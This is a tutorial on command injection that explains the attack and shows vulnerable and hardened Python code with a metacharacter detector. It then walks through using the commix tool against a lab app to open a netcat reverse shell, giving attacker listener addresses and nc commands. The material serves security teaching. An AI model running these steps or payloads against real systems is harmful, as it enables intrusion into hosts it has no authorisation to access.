In this tutorial, following our summer bootcamp, we want to talk about the power of command injection and its use cases.
What is Command Injection?
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
This attack differs from code injection, in which the attacker adds their own code that is then executed by the application. With code injection the attacker extends the default functionality of the application without needing to execute system commands.
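As an added example that is not part of the original tutorial, the Python code below shows the vulnerable pattern described above (a user-supplied hostname spliced into a string that a system shell parses) beside a hardened version that allow-lists the value and calls the program with an argv list and no shell. The `echo` command stands in for a real network tool such as ping so that it runs offline; the hostnames and the `INJECTED` marker are constructed test values.

```python
import re
import subprocess

# Allow-list for a DNS hostname: letters, digits, dots and hyphens only.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def lookup_vulnerable(host: str) -> str:
    """Vulnerable pattern: the user value is spliced into a command string
    that a system shell parses, so shell metacharacters in it are honoured.
    'echo' stands in for the real tool (ping, nslookup) to keep this offline."""
    cmd = f"echo Looking up {host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def lookup_no_shell(host: str) -> str:
    """Partial fix: an argv list with shell=False means no shell ever sees the
    value, so ';' and similar characters become literal text of one argument.
    The called program still receives whatever was typed, so validation is
    still needed (a value starting with '-' could be read as an option)."""
    argv = ["echo", "Looking", "up", host]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def lookup_hardened(host: str) -> str:
    """Hardened pattern: allow-list the value first, then call without a shell."""
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host value: {host!r}")
    return lookup_no_shell(host)


def has_shell_metachars(value: str) -> bool:
    """Detection helper for request logs or input filters: flags the characters
    a POSIX shell uses to chain or substitute commands (constructed list, not
    exhaustive; it complements the allow-list, it does not replace it)."""
    return any(ch in value for ch in ";|&`$()<>\n")


if __name__ == "__main__":
    payload = "example.com; echo INJECTED"   # constructed test input
    print(lookup_vulnerable(payload))        # second output line reads INJECTED
    print(lookup_no_shell(payload))          # whole payload echoed literally
    try:
        lookup_hardened(payload)
    except ValueError as err:
        print(err)                           # rejected by the allow-list
```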
Who can be the Victim of Command Injection?
Command injection attacks are independent of the operating system in use: they can target Linux, Unix and Windows alike. They are also independent of the programming language, since applications written in C, Java, C++, PHP, Python and many other languages can be vulnerable.
How Does Commix Work?
Commix works in three steps. First, the attack vector generator module generates attack vectors: the different injection techniques, namely classic, eval-based, time-based and file-based. Second, these attack vectors are used to test the host application (the target) for the vulnerability. If the vulnerability is found, the third step, exploitation, is launched to exploit it.
Commix is an automated command injection tool. It lets you have a Meterpreter or Netcat session via command injection if the web application is vulnerable to it. It’s efficient and almost reliable.
Commix is widely used by penetration testers, security experts and also web developers in order to find vulnerabilities.
In this article, we will learn how to get a netcat session using commix. For the detailed guide on commix click here.
As you can see on the image below the environment of PheniixLab is definitely vulnerable to command injection.
Capture the cookies of PheniixLab in Burp Suite as shown in the image below:
Copy the contents of the cookies into a TXT file and use the following command to attack:
commix -r /root/Desktop/1.txt
Once the exploitation is successful, it will ask you whether you want to load the pseudo-terminal or not.
Type 'y' and the pseudo-terminal will be loaded. Use the command 'whoami' to check the current user, as shown in the image:
Now that you are in the pseudo-terminal, type the following commands in order to generate a reverse shell:
set lhost 192.168.1.107
set lport 4321
After executing the above commands, it will ask you if you want to have a Netcat shell or other (Meterpreter) shell.
Choose option 1 as we will try to take a Netcat session. Then choose option 1 to use default Netcat settings for the target. Then type y to use /bin as your subdirectory.
Simultaneously, turn on the netcat listener by using the following command:
nc -lvp 4321
If the steps execute correctly, you will have your session, as shown in the image below:
Another method to get a netcat session is by using different settings of netcat. For this, repeat the above steps, but this time around, choose option 3 under the category of ‘unix-like targets’ for the traditional netcat settings.
Again, simultaneously start the netcat listener with the following command:
nc -lvp 1234
So by using this method, you can use commix yet again to gain a netcat session through various methods.